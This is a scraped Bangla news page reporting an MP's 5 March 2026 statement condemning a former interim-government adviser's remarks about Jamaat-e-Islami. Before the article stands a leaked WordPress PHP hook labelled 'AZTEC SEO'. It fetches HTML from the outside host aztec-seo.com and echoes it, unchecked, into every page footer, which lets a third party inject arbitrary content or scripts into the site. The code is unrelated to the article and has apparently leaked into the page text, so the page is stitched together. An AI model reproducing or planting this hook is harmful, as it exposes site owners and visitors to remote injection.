/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); সাবেক উপদেষ্টা রিজওয়ানার বক্তব্যের প্রতিবাদ জানিয়েছেন সাইফুল আলম খান | Dhaka Sky News

ইরানের অনেক ড্রোন আটকাতে সক্ষম নয় মার্কিন বিমান প্রতিরক্ষা ব্যবস্থা: ট্রাম্প প্রশাসন

আগের সংবাদ

সরকারি অফিসে লাইট-এসি ব্যবহারে কড়াকড়ি

পরের সংবাদ

সাবেক উপদেষ্টা রিজওয়ানার বক্তব্যের প্রতিবাদ জানিয়েছেন সাইফুল আলম খান

ইত্তেফাক ডিজিটাল ডেস্ক

প্রকাশিত: March 5, 2026 , 6:49 pm

অন্তর্বর্তীকালীন সরকারের সাবেক উপদেষ্টা সৈয়দা রিজওয়ানা হাসান বক্তব্যের প্রতিবাদ ও নিন্দা জানিয়েছেন কেন্দ্রীয় নির্বাহী পরিষদের সদস্য ও ঢাকা-১২ আসনের সংসদ সদস্য (এমপি) সাইফুল আলম খান মিলন। বৃহস্পতিবার (৫ মার্চ) প্রেস বিজ্ঞপ্তির মাধ্যমে তিনি প্রতিবাদ ও নিন্দা জানান।
বিজ্ঞপ্তিতে সংসদ সদস্য সাইফুল আলম খান মিলন বলেন, ‘অন্তর্বর্তীকালীন সরকারের সাবেক উপদেষ্টা সৈয়দা রিজওয়ানা হাসান সম্প্রতি গণমাধ্যমে দেয়া এক সাক্ষাৎকারে বলেছেন, বাংলাদেশ জামায়াতে ইসলামীর মতো একটি ডানপন্থী দল যেন দেশের রাজনীতিতে মেইনস্ট্রিমে আসতে না পারে, সে চেষ্টা তারা করেছেন এবং তাদেরকে মেইনস্ট্রিম হতে দেননি।’

প্রেস বিজ্ঞপ্তিতে ঢাকা-১২ আসনের সংসদ সদস্য মিলন বলেন, ‘একটি গণতান্ত্রিক রাষ্ট্রে এই ধরনের বক্তব্য অত্যন্ত উদ্বেগজনক, অগণতান্ত্রিক এবং জনগণের রাজনৈতিক অধিকারের প্রতি সরাসরি অবজ্ঞার শামিল। কোন রাজনৈতিক দল মেইনস্ট্রিমে থাকবে আর কোন দল থাকবে না— এ সিদ্ধান্ত কোনো ব্যক্তি, উপদেষ্টা বা প্রশাসনিক গোষ্ঠীর নয়; এটি একমাত্র দেশের জনগণই তাদের ভোটের মাধ্যমে নির্ধারণ করেন।’

তিনি বলেন, ‘সরকারের দায়িত্বশীল অবস্থানে থেকে এ ধরনের বক্তব্য শুধু অনভিপ্রেতই নয়, বরং ত্রয়োদশ জাতীয় সংসদ নির্বাচনকে ঘিরে যে ইলেকশন ইঞ্জিনিয়ারিংয়ের যে অভিযোগ উঠেছে, সেটিকেই আরও জোরালোভাবে সত্য প্রতিপন্ন করে। এটি অন্তর্বর্তী সরকারের ঘোষিত নিরপেক্ষতার দাবিকেও চরমভাবে প্রশ্নবিদ্ধ করেছে।’